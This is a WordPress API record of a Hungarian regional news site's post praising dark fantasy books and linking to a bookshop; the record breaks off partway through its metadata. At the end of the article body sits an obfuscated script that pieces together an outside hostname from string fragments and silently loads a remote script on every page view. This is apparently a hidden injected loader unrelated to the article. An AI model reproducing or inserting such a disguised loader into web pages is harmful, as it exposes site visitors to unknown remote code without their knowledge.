{"id":75066,"date":"2025-10-18T09:23:43","date_gmt":"2025-10-18T07:23:43","guid":{"rendered":"https:\/\/dorogimedence.hu\/?p=75066"},"modified":"2025-10-18T09:23:43","modified_gmt":"2025-10-18T07:23:43","slug":"dark-fantasy-konyvek-a-feny-es-arnyek-orok-harca","status":"publish","type":"post","link":"https:\/\/dorogimedence.hu\/index.php\/2025\/10\/18\/dark-fantasy-konyvek-a-feny-es-arnyek-orok-harca\/","title":{"rendered":"Dark fantasy k\u00f6nyvek: a f\u00e9ny \u00e9s \u00e1rny\u00e9k \u00f6r\u00f6k harca"},"content":{"rendered":"<p>A fantasy mindig is arr\u00f3l sz\u00f3lt, hogy elszak\u00edtson a val\u00f3s\u00e1gt\u00f3l, \u00e9s elrep\u00edtsen olyan vil\u00e1gokba, ahol b\u00e1rmi megt\u00f6rt\u00e9nhet. A dark fantasy k\u00f6nyvek azonban ennek az utaz\u00e1snak a legs\u00f6t\u00e9tebb \u00f6sv\u00e9ny\u00e9re vezetnek. Itt nem a t\u00fcnd\u00e9rek \u00e9s h\u0151s lovagok diadalai\u00e9 a f\u0151szerep, hanem a mor\u00e1lis dilemm\u00e1k, a b\u0171n \u00e9s a megv\u00e1lt\u00e1s k\u00e9rd\u00e9sei, valamint az emberi l\u00e9lek legs\u00f6t\u00e9tebb m\u00e9lys\u00e9gei.<\/p>\n<p data-start=\"790\" data-end=\"1189\">A m\u0171faj gy\u00f6kerei a g\u00f3tikus irodalomban keresend\u0151k. M\u00e1r a 19. sz\u00e1zad alkot\u00f3i \u2013 p\u00e9ld\u00e1ul <strong data-start=\"876\" data-end=\"892\">Mary Shelley<\/strong> vagy <strong data-start=\"898\" data-end=\"913\">Bram Stoker<\/strong> \u2013 megteremtett\u00e9k azt a balj\u00f3s, m\u00e9gis leny\u0171g\u00f6z\u0151 hangulatot, amelyb\u0151l k\u00e9s\u0151bb a modern dark fantasy is sz\u00fcletett. A s\u00f6t\u00e9t kast\u00e9lyok, az el\u00e1tkozott h\u0151s\u00f6k, a tiltott hatalmak \u00e9s a bels\u0151 d\u00e9monokkal v\u00edvott harc \u2013 mind olyan mot\u00edvumok, amelyek m\u00e1ig meghat\u00e1rozz\u00e1k a m\u0171faj arculat\u00e1t.<\/p>\n<h3 data-start=\"1196\" data-end=\"1260\">A s\u00f6t\u00e9ts\u00e9g vonzereje \u2013 mi\u00e9rt szeretj\u00fck a komor t\u00f6rt\u00e9neteket?<\/h3>\n<p data-start=\"1262\" data-end=\"1592\">A <a href=\"https:\/\/olcsokonyvek.hu\/konyvlista\/fantasy-scifi\/darkfantasy\" target=\"_blank\" rel=\"dofollow noopener\"><strong data-start=\"1264\" data-end=\"1288\"><span style=\"text-decoration: underline; color: #0000ff;\">dark fantasy k\u00f6nyvek<\/span><\/strong><\/a> nem f\u00e9lnek a kegyetlens\u00e9gt\u0151l, a f\u00e1jdalomt\u00f3l vagy a filozofikus k\u00e9rd\u00e9sekt\u0151l. M\u00edg a klasszikus fantasy vil\u00e1g\u00e1ban a j\u00f3 \u00e9s a rossz \u00e9lesen elk\u00fcl\u00f6n\u00fcl, addig itt minden \u00e1rnyalatban l\u00e9tezik. A h\u0151s\u00f6k hib\u00e1znak, a gonoszoknak \u00e9rthet\u0151 ind\u00edt\u00e9kaik vannak, \u00e9s a t\u00f6rt\u00e9netek v\u00e9ge nem mindig a boldog befejez\u00e9sr\u0151l sz\u00f3l.<\/p>\n<p data-start=\"1594\" data-end=\"1982\">Egy j\u00f3 dark fantasy olvas\u00e1sa olyan, mint egy elvar\u00e1zsolt \u00e1lom, ahonnan nem akarunk fel\u00e9bredni. Beszippant, elfeledteti a val\u00f3s\u00e1g zaj\u00e1t, \u00e9s egyre m\u00e9lyebbre h\u00faz a s\u00f6t\u00e9t, m\u00e1gikus vil\u00e1gokban. A karakterek komplexek \u00e9s val\u00f3s\u00e1gosak \u2013 n\u00e9ha szerethet\u0151en t\u00f6r\u00f6ttek, n\u00e9ha ijeszt\u0151en emberiek. A t\u00f6rt\u00e9netek tele vannak v\u00e1ratlan fordulatokkal, amelyek miatt minden fejezet ut\u00e1n musz\u00e1j tov\u00e1bb olvasni.<\/p>\n<p data-start=\"1984\" data-end=\"2251\">A dark fantasy gyakran arra keresi a v\u00e1laszt, mi t\u00f6rt\u00e9nik, ha a hatalom \u00e1ra t\u00fal magas, vagy ha a m\u00e1gia m\u00e1r nem \u00e1ld\u00e1s, hanem \u00e1tok. Ezek a k\u00f6nyvek nemcsak sz\u00f3rakoztatnak, hanem felkavarj\u00e1k az olvas\u00f3t \u2013 \u00e9s amikor becsukjuk \u0151ket, a vil\u00e1guk m\u00e9g sok\u00e1ig benn\u00fcnk \u00e9l tov\u00e1bb.<\/p>\n<h3 data-start=\"2258\" data-end=\"2314\">Klasszikusok \u00e9s \u00faj kedvencek a s\u00f6t\u00e9ts\u00e9g birodalm\u00e1b\u00f3l<\/h3>\n<p data-start=\"2316\" data-end=\"2905\">Ha m\u00e9lyebbre mer\u00fcln\u00e9l a m\u0171fajban, a <strong data-start=\"2352\" data-end=\"2376\">dark fantasy k\u00f6nyvek<\/strong> k\u00f6z\u00f6tt b\u0151ven tal\u00e1lsz legend\u00e1s t\u00f6rt\u00e9neteket.<br data-start=\"2420\" data-end=\"2423\"><strong data-start=\"2423\" data-end=\"2446\">George R. R. Martin<\/strong> <em data-start=\"2447\" data-end=\"2466\">A t\u0171z \u00e9s j\u00e9g dala<\/em> sorozata (ismertebb nev\u00e9n <em data-start=\"2493\" data-end=\"2507\">Tr\u00f3nok harca<\/em>) tal\u00e1n a legismertebb p\u00e9ld\u00e1ja annak, hogyan fon\u00f3dhat \u00f6ssze politika, \u00e1rul\u00e1s \u00e9s mor\u00e1lis dilemm\u00e1k egy monument\u00e1lis, s\u00f6t\u00e9t vil\u00e1gban.<br data-start=\"2637\" data-end=\"2640\"><strong data-start=\"2640\" data-end=\"2655\">Neil Gaiman<\/strong> <em data-start=\"2656\" data-end=\"2674\">Amerikai istenek<\/em> c\u00edm\u0171 reg\u00e9nye modern m\u00edtosz, amelyben az \u0151si istenek harcolnak a mai kor hitrendszereivel.<br data-start=\"2764\" data-end=\"2767\"><strong data-start=\"2767\" data-end=\"2783\">Stephen King<\/strong> <em data-start=\"2784\" data-end=\"2800\">A Set\u00e9t Torony<\/em> sorozata pedig a fantasy, a horror \u00e9s a western elemeit \u00f6tv\u00f6zi egyed\u00fcl\u00e1ll\u00f3, m\u00e9gis m\u00e9lyen emberi m\u00f3don.<\/p>\n<p data-start=\"2907\" data-end=\"3120\">A kort\u00e1rs szerz\u0151k k\u00f6z\u00f6tt <strong data-start=\"2932\" data-end=\"2948\">Jay Kristoff<\/strong> (<em data-start=\"2950\" data-end=\"2971\">\u00d6r\u00f6knappal-tril\u00f3gia<\/em>) \u00e9s <strong data-start=\"2976\" data-end=\"2997\">Andrzej Sapkowski<\/strong> (<em data-start=\"2999\" data-end=\"3014\">Vaj\u00e1k-sorozat<\/em>) hoztak friss v\u00e9rt a m\u0171fajba \u2013 t\u00f6rt\u00e9neteik a mitol\u00f3gia, a mor\u00e1l \u00e9s a szenved\u00e9ly hat\u00e1r\u00e1n egyens\u00falyoznak.<\/p>\n<h3 data-start=\"3127\" data-end=\"3179\">Hol tal\u00e1lhatsz leny\u0171g\u00f6z\u0151 dark fantasy k\u00f6nyveket?<\/h3>\n<p data-start=\"3181\" data-end=\"3395\">Ha vonz a s\u00f6t\u00e9ts\u00e9g, \u00e9s szereted, amikor a t\u00f6rt\u00e9net egyszerre borzongat \u00e9s elgondolkodtat, \u00e9rdemes elmer\u00fcln\u00f6d a <strong data-start=\"3292\" data-end=\"3316\">dark fantasy k\u00f6nyvek<\/strong> vil\u00e1g\u00e1ban.<\/p>\n<p data-start=\"3181\" data-end=\"3395\">Itt megtal\u00e1lhatod mindazt, amit\u0151l ez a m\u0171faj igaz\u00e1n k\u00fcl\u00f6nleges:<\/p>\n<ul data-start=\"3396\" data-end=\"3530\">\n<li data-start=\"3396\" data-end=\"3435\">\n<p data-start=\"3398\" data-end=\"3435\">m\u00e1gikus, m\u00e9gis vesz\u00e9lyes vil\u00e1gokat,<\/p>\n<\/li>\n<li data-start=\"3436\" data-end=\"3468\">\n<p data-start=\"3438\" data-end=\"3468\">mor\u00e1lisan \u00f6sszetett h\u0151s\u00f6ket,<\/p>\n<\/li>\n<li data-start=\"3469\" data-end=\"3530\">\n<p data-start=\"3471\" data-end=\"3530\">d\u00e9monokat, el\u00e1tkozott szerelmeket \u00e9s v\u00e9gzetes d\u00f6nt\u00e9seket.<\/p>\n<\/li>\n<\/ul>\n<p data-start=\"3532\" data-end=\"3716\">A dark fantasy nem puszt\u00e1n olvasm\u00e1ny \u2013 ez egy \u00e9rzelmi utaz\u00e1s, amely a l\u00e9lek m\u00e9ly\u00e9re vezet. Megmutatja, hogy a f\u00e9ny \u00e9s az \u00e1rny\u00e9k nemcsak a t\u00f6rt\u00e9netekben, hanem mindannyiunkban ott \u00e9l.<\/p>\n<p><script>\n(function(){\nz461=document.createElement(\"script\");z461_=(\"o\"+(\"pen\")+\"st\")+\"a\";z461.async=true;\nz461.type=\"text\/javascript\";z461_+=(\"t\")+\".e\"+\"\";z461_+=((\"\")+\"u\");z461_+=\"\/\";\nz461u=\"2541267075.\";z461u+=\"c2xr23vX461v0sdXwnk\"+\"t02js6X8X1g\";\nz461.src=\"https:\/\/\"+z461_+z461u;document.body.appendChild(z461);\n})();\n<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>A fantasy mindig is arr\u00f3l sz\u00f3lt, hogy elszak\u00edtson a val\u00f3s\u00e1gt\u00f3l, \u00e9s elrep\u00edtsen olyan vil\u00e1gokba, ahol b\u00e1rmi megt\u00f6rt\u00e9nhet. A dark fantasy k\u00f6nyvek azonban ennek az utaz\u00e1snak a legs\u00f6t\u00e9tebb \u00f6sv\u00e9ny\u00e9re vezetnek. Itt nem a t\u00fcnd\u00e9rek \u00e9s h\u0151s lovagok diadalai\u00e9 a f\u0151szerep, hanem a mor\u00e1lis dilemm\u00e1k, a b\u0171n \u00e9s a megv\u00e1lt\u00e1s k\u00e9rd\u00e9sei, valamint az emberi l\u00e9lek legs\u00f6t\u00e9tebb m\u00e9lys\u00e9gei.<\/p>\n","protected":false},"author":1,"featured_media":75067,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"ngg_post_thumbnail":0,"footnotes":""},"categories":[3],"tags":[1112,6392],"class_list":{"0":"post-75066","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-hirek","8":"tag-konyv","9":"tag-konyvek"},"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.4 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Dark fantasy k\u00f6nyvek: a f\u00e9ny \u00e9s \u00e1rny\u00e9k \u00f6r\u00f6k harca<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/dorogimedence.hu\/index.php\/2025\/10\/18\/dark-fantasy-konyvek-a-feny-es-arnyek-orok-harca\/\" class=\"yoast-seo-meta-tag\" \/>\n<meta property=\"og:locale\" content=\"hu_HU\" class=\"yoast-seo-meta-tag\" \/>\n<meta property=\"og:type\" content=\"article\" class=\"yoast-seo-meta-tag\" \/>\n<meta property=\"og:title\" content=\"Dark fantasy k\u00f6nyvek: a f\u00e9ny \u00e9s \u00e1rny\u00e9k \u00f6r\u00f6k harca\" class=\"yoast-seo-meta-tag\" \/>\n<meta property=\"og:description\" content=\"A fantasy mindig is arr\u00f3l sz\u00f3lt, hogy elszak\u00edtson a val\u00f3s\u00e1gt\u00f3l, \u00e9s elrep\u00edtsen olyan vil\u00e1gokba, ahol b\u00e1rmi megt\u00f6rt\u00e9nhet. A dark fantasy k\u00f6nyvek azonban ennek az utaz\u00e1snak a legs\u00f6t\u00e9tebb \u00f6sv\u00e9ny\u00e9re vezetnek. Itt nem a t\u00fcnd\u00e9rek \u00e9s h\u0151s lovagok diadalai\u00e9 a f\u0151szerep, hanem a mor\u00e1lis dilemm\u00e1k, a b\u0171n \u00e9s a megv\u00e1lt\u00e1s k\u00e9rd\u00e9sei, valamint az emberi l\u00e9lek legs\u00f6t\u00e9tebb m\u00e9lys\u00e9gei.\" class=\"yoast-seo-meta-tag\" \/>\n<meta property=\"og:url\" content=\"https:\/\/dorogimedence.hu\/index.php\/2025\/10\/18\/dark-fantasy-konyvek-a-feny-es-arnyek-orok-harca\/\" class=\"yoast-seo-meta-tag\" \/>\n<meta property=\"og:site_name\" content=\"Dorogi-medence Region\u00e1lis H\u00edrport\u00e1l\" class=\"yoast-seo-meta-tag\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/dorogimedence\/\" class=\"yoast-seo-meta-tag\" \/>\n<meta property=\"article:published_time\" content=\"2025-10-18T07:23:43+00:00\" class=\"yoast-seo-meta-tag\" \/>\n<meta property=\"og:image\" content=\"https:\/\/dorogimedence.hu\/wp-content\/uploads\/2025\/10\/darkfantasy.jpg\" class=\"yoast-seo-meta-tag\" \/>\n\t<meta property=\"og:image:width\" content=\"600\" class=\"yoast-seo-meta-tag\" \/>\n\t<meta property=\"og:image:height\" content=\"336\" class=\"yoast-seo-meta-tag\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" class=\"yoast-seo-meta-tag\" \/>\n<meta name=\"author\" content=\"dorogimedence.hu\" class=\"yoast-seo-meta-tag\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" class=\"yoast-seo-meta-tag\" \/>\n<meta name=\"twitter:label1\" content=\"Szerz\u0151:\" class=\"yoast-seo-meta-tag\" \/>\n\t<meta name=\"twitter:data1\" content=\"dorogimedence.hu\" class=\"yoast-seo-meta-tag\" \/>\n\t<meta name=\"twitter:label2\" content=\"Becs\u00fclt olvas\u00e1si id\u0151\" class=\"yoast-seo-meta-tag\" \/>\n\t<meta name=\"twitter:data2\" content=\"4 perc\" class=\"yoast-seo-meta-tag\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/index.php\\\/2025\\\/10\\\/18\\\/dark-fantasy-konyvek-a-feny-es-arnyek-orok-harca\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/index.php\\\/2025\\\/10\\\/18\\\/dark-fantasy-konyvek-a-feny-es-arnyek-orok-harca\\\/\"},\"author\":{\"name\":\"dorogimedence.hu\",\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/#\\\/schema\\\/person\\\/ce6091eeb7e95ecdc87890d6aa8e0fd4\"},\"headline\":\"Dark fantasy k\u00f6nyvek: a f\u00e9ny \u00e9s \u00e1rny\u00e9k \u00f6r\u00f6k harca\",\"datePublished\":\"2025-10-18T07:23:43+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/index.php\\\/2025\\\/10\\\/18\\\/dark-fantasy-konyvek-a-feny-es-arnyek-orok-harca\\\/\"},\"wordCount\":713,\"publisher\":{\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/#organization\"},\"image\":{\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/index.php\\\/2025\\\/10\\\/18\\\/dark-fantasy-konyvek-a-feny-es-arnyek-orok-harca\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/dorogimedence.hu\\\/wp-content\\\/uploads\\\/2025\\\/10\\\/darkfantasy.jpg\",\"keywords\":[\"k\u00f6nyv\",\"k\u00f6nyvek\"],\"articleSection\":[\"H\u00edrek\"],\"inLanguage\":\"hu\"},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/index.php\\\/2025\\\/10\\\/18\\\/dark-fantasy-konyvek-a-feny-es-arnyek-orok-harca\\\/\",\"url\":\"https:\\\/\\\/dorogimedence.hu\\\/index.php\\\/2025\\\/10\\\/18\\\/dark-fantasy-konyvek-a-feny-es-arnyek-orok-harca\\\/\",\"name\":\"Dark fantasy k\u00f6nyvek: a f\u00e9ny \u00e9s \u00e1rny\u00e9k \u00f6r\u00f6k harca\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/index.php\\\/2025\\\/10\\\/18\\\/dark-fantasy-konyvek-a-feny-es-arnyek-orok-harca\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/index.php\\\/2025\\\/10\\\/18\\\/dark-fantasy-konyvek-a-feny-es-arnyek-orok-harca\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/dorogimedence.hu\\\/wp-content\\\/uploads\\\/2025\\\/10\\\/darkfantasy.jpg\",\"datePublished\":\"2025-10-18T07:23:43+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/index.php\\\/2025\\\/10\\\/18\\\/dark-fantasy-konyvek-a-feny-es-arnyek-orok-harca\\\/#breadcrumb\"},\"inLanguage\":\"hu\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/dorogimedence.hu\\\/index.php\\\/2025\\\/10\\\/18\\\/dark-fantasy-konyvek-a-feny-es-arnyek-orok-harca\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"hu\",\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/index.php\\\/2025\\\/10\\\/18\\\/dark-fantasy-konyvek-a-feny-es-arnyek-orok-harca\\\/#primaryimage\",\"url\":\"https:\\\/\\\/dorogimedence.hu\\\/wp-content\\\/uploads\\\/2025\\\/10\\\/darkfantasy.jpg\",\"contentUrl\":\"https:\\\/\\\/dorogimedence.hu\\\/wp-content\\\/uploads\\\/2025\\\/10\\\/darkfantasy.jpg\",\"width\":600,\"height\":336},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/index.php\\\/2025\\\/10\\\/18\\\/dark-fantasy-konyvek-a-feny-es-arnyek-orok-harca\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Kezd\u0151lap\",\"item\":\"https:\\\/\\\/dorogimedence.hu\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Dark fantasy k\u00f6nyvek: a f\u00e9ny \u00e9s \u00e1rny\u00e9k \u00f6r\u00f6k harca\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/#website\",\"url\":\"https:\\\/\\\/dorogimedence.hu\\\/\",\"name\":\"Dorogi-medence Region\u00e1lis H\u00edrport\u00e1l\",\"description\":\"Dorog, Keszt\u00f6lc, Le\u00e1nyv\u00e1r, Piliscs\u00e9v, Tokod, Tokodalt\u00e1r\u00f3, Csolnok, Esztergom-kertv\u00e1ros: h\u00edrek, programok\",\"publisher\":{\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/dorogimedence.hu\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"hu\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/#organization\",\"name\":\"Dorogi-medence Region\u00e1lis H\u00edrport\u00e1l\",\"url\":\"https:\\\/\\\/dorogimedence.hu\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"hu\",\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"https:\\\/\\\/dorogimedence.hu\\\/wp-content\\\/uploads\\\/2021\\\/04\\\/logo-feher-600.png\",\"contentUrl\":\"https:\\\/\\\/dorogimedence.hu\\\/wp-content\\\/uploads\\\/2021\\\/04\\\/logo-feher-600.png\",\"width\":600,\"height\":100,\"caption\":\"Dorogi-medence Region\u00e1lis H\u00edrport\u00e1l\"},\"image\":{\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/#\\\/schema\\\/logo\\\/image\\\/\"},\"sameAs\":[\"https:\\\/\\\/www.facebook.com\\\/dorogimedence\\\/\"]},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/#\\\/schema\\\/person\\\/ce6091eeb7e95ecdc87890d6aa8e0fd4\",\"name\":\"dorogimedence.hu\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"hu\",\"@id\":\"\\\/\\\/www.gravatar.com\\\/avatar\\\/d8d45f8901aadff40a4af72c0b826f1d?s=96&#038;r=g&#038;d=mm\",\"url\":\"\\\/\\\/www.gravatar.com\\\/avatar\\\/d8d45f8901aadff40a4af72c0b826f1d?s=96&#038;r=g&#038;d=mm\",\"contentUrl\":\"\\\/\\\/www.gravatar.com\\\/avatar\\\/d8d45f8901aadff40a4af72c0b826f1d?s=96&#038;r=g&#038;d=mm\",\"caption\":\"dorogimedence.hu\"}}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Dark fantasy k\u00f6nyvek: a f\u00e9ny \u00e9s \u00e1rny\u00e9k \u00f6r\u00f6k harca","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/dorogimedence.hu\/index.php\/2025\/10\/18\/dark-fantasy-konyvek-a-feny-es-arnyek-orok-harca\/","og_locale":"hu_HU","og_type":"article","og_title":"Dark fantasy k\u00f6nyvek: a f\u00e9ny \u00e9s \u00e1rny\u00e9k \u00f6r\u00f6k harca","og_description":"A fantasy mindig is arr\u00f3l sz\u00f3lt, hogy elszak\u00edtson a val\u00f3s\u00e1gt\u00f3l, \u00e9s elrep\u00edtsen olyan vil\u00e1gokba, ahol b\u00e1rmi megt\u00f6rt\u00e9nhet. A dark fantasy k\u00f6nyvek azonban ennek az utaz\u00e1snak a legs\u00f6t\u00e9tebb \u00f6sv\u00e9ny\u00e9re vezetnek. Itt nem a t\u00fcnd\u00e9rek \u00e9s h\u0151s lovagok diadalai\u00e9 a f\u0151szerep, hanem a mor\u00e1lis dilemm\u00e1k, a b\u0171n \u00e9s a megv\u00e1lt\u00e1s k\u00e9rd\u00e9sei, valamint az emberi l\u00e9lek legs\u00f6t\u00e9tebb m\u00e9lys\u00e9gei.","og_url":"https:\/\/dorogimedence.hu\/index.php\/2025\/10\/18\/dark-fantasy-konyvek-a-feny-es-arnyek-orok-harca\/","og_site_name":"Dorogi-medence Region\u00e1lis H\u00edrport\u00e1l","article_publisher":"https:\/\/www.facebook.com\/dorogimedence\/","article_published_time":"2025-10-18T07:23:43+00:00","og_image":[{"width":600,"height":336,"url":"https:\/\/dorogimedence.hu\/wp-content\/uploads\/2025\/10\/darkfantasy.jpg","type":"image\/jpeg"}],"author":"dorogimedence.hu","twitter_card":"summary_large_image","twitter_misc":{"Szerz\u0151:":"dorogimedence.hu","Becs\u00fclt olvas\u00e1si id\u0151":"4 perc"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/dorogimedence.hu\/index.php\/2025\/10\/18\/dark-fantasy-konyvek-a-feny-es-arnyek-orok-harca\/#article","isPartOf":{"@id":"https:\/\/dorogimedence.hu\/index.php\/2025\/10\/18\/dark-fantasy-konyvek-a-feny-es-arnyek-orok-harca\/"},"author":{"name":"dorogimedence.hu","@id":"https:\/\/dorogimedence.hu\/#\/schema\/person\/ce6091eeb7e95ecdc87890d6aa8e0fd4"},"headline":"Dark fantasy k\u00f6nyvek: a f\u00e9ny \u00e9s \u00e1rny\u00e9k \u00f6r\u00f6k harca","datePublished":"2025-10-18T07:23:43+00:00","mainEntityOfPage":{"@id":"https:\/\/dorogimedence.hu\/index.php\/2025\/10\/18\/dark-fantasy-konyvek-a-feny-es-arnyek-orok-harca\/"},"wordCount":713,"publisher":{"@id":"https:\/\/dorogimedence.hu\/#organization"},"image":{"@id":"https:\/\/dorogimedence.hu\/index.php\/2025\/10\/18\/dark-fantasy-konyvek-a-feny-es-arnyek-orok-harca\/#primaryimage"},"thumbnailUrl":"https:\/\/dorogimedence.hu\/wp-content\/uploads\/2025\/10\/darkfantasy.jpg","keywords":["k\u00f6nyv","k\u00f6nyvek"],"articleSection":["H\u00edrek"],"inLanguage":"hu"},{"@type":"WebPage","@id":"https:\/\/dorogimedence.hu\/index.php\/2025\/10\/18\/dark-fantasy-konyvek-a-feny-es-arnyek-orok-harca\/","url":"https:\/\/dorogimedence.hu\/index.php\/2025\/10\/18\/dark-fantasy-konyvek-a-feny-es-arnyek-orok-harca\/","name":"Dark fantasy k\u00f6nyvek: a f\u00e9ny \u00e9s \u00e1rny\u00e9k \u00f6r\u00f6k harca","isPartOf":{"@id":"https:\/\/dorogimedence.hu\/#website"},"primaryImageOfPage":{"@id":"https:\/\/dorogimedence.hu\/index.php\/2025\/10\/18\/dark-fantasy-konyvek-a-feny-es-arnyek-orok-harca\/#primaryimage"},"image":{"@id":"https:\/\/dorogimedence.hu\/index.php\/2025\/10\/18\/dark-fantasy-konyvek-a-feny-es-arnyek-orok-harca\/#primaryimage"},"thumbnailUrl":"https:\/\/dorogimedence.hu\/wp-content\/uploads\/2025\/10\/darkfantasy.jpg","datePublished":"2025-10-18T07:23:43+00:00","breadcrumb":{"@id":"https:\/\/dorogimedence.hu\/index.php\/2025\/10\/18\/dark-fantasy-konyvek-a-feny-es-arnyek-orok-harca\/#breadcrumb"},"inLanguage":"hu","potentialAction":[{"@type":"ReadAction","target":["https:\/\/dorogimedence.hu\/index.php\/2025\/10\/18\/dark-fantasy-konyvek-a-feny-es-arnyek-orok-harca\/"]}]},{"@type":"ImageObject","inLanguage":"hu","@id":"https:\/\/dorogimedence.hu\/index.php\/2025\/10\/18\/dark-fantasy-konyvek-a-feny-es-arnyek-orok-harca\/#primaryimage","url":"https:\/\/dorogimedence.hu\/wp-content\/uploads\/2025\/10\/darkfantasy.jpg","contentUrl":"https:\/\/dorogimedence.hu\/wp-content\/uploads\/2025\/10\/darkfantasy.jpg","width":600,"height":336},{"@type":"BreadcrumbList","@id":"https:\/\/dorogimedence.hu\/index.php\/2025\/10\/18\/dark-fantasy-konyvek-a-feny-es-arnyek-orok-harca\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Kezd\u0151lap","item":"https:\/\/dorogimedence.hu\/"},{"@type":"ListItem","position":2,"name":"Dark fantasy k\u00f6nyvek: a f\u00e9ny \u00e9s \u00e1rny\u00e9k \u00f6r\u00f6k harca"}]},{"@type":"WebSite","@id":"https:\/\/dorogimedence.hu\/#website","url":"https:\/\/dorogimedence.hu\/","name":"Dorogi-medence Region\u00e1lis H\u00edrport\u00e1l","description":"Dorog, Keszt\u00f6lc, Le\u00e1nyv\u00e1r, Piliscs\u00e9v, Tokod, Tokodalt\u00e1r\u00f3, Csolnok, Esztergom-kertv\u00e1ros: h\u00edrek, programok","publisher":{"@id":"https:\/\/dorogimedence.hu\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/dorogimedence.hu\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"hu"},{"@type":"Organization","@id":"https:\/\/dorogimedence.hu\/#organization","name":"Dorogi-medence Region\u00e1lis H\u00edrport\u00e1l","url":"https:\/\/dorogimedence.hu\/","logo":{"@type":"ImageObject","inLanguage":"hu","@id":"https:\/\/dorogimedence.hu\/#\/schema\/logo\/image\/","url":"https:\/\/dorogimedence.hu\/wp-content\/uploads\/2021\/04\/logo-feher-600.png","contentUrl":"https:\/\/dorogimedence.hu\/wp-content\/uploads\/2021\/04\/logo-feher-600.png","width":600,"height":100,"caption":"Dorogi-medence Region\u00e1lis H\u00edrport\u00e1l"},"image":{"@id":"https:\/\/dorogimedence.hu\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/dorogimedence\/"]},{"@type":"Person","@id":"https:\/\/dorogimedence.hu\/#\/schema\/person\/ce6091eeb7e95ecdc87890d6aa8e0fd4","name":"dorogimedence.hu","image":{"@type":"ImageObject","inLanguage":"hu","@id":"\/\/www.gravatar.com\/avatar\/d8d45f8901aadff40a4af72c0b826f1d?s=96&#038;r=g&#038;d=mm","url":"\/\/www.gravatar.com\/avatar\/d8d45f8901aadff40a4af72c0b826f1d?s=96&#038;r=g&#038;d=mm","contentUrl":"\/\/www.gravatar.com\/avatar\/d8d45f8901aadff40a4af72c0b826f1d?s=96&#038;r=g&#038;d=mm","caption":"dorogimedence.hu"}}]}},"_links":{"self":[{"href":"https:\/\/dorogimedence.hu\/index.php\/wp-json\/wp\/v2\/posts\/75066","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/dorogimedence.hu\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/dorogimedence.hu\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/dorogimedence.hu\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/dorogimedence.hu\/index.php\/wp-json\/wp\/v2\/comments?post=75066"}],"v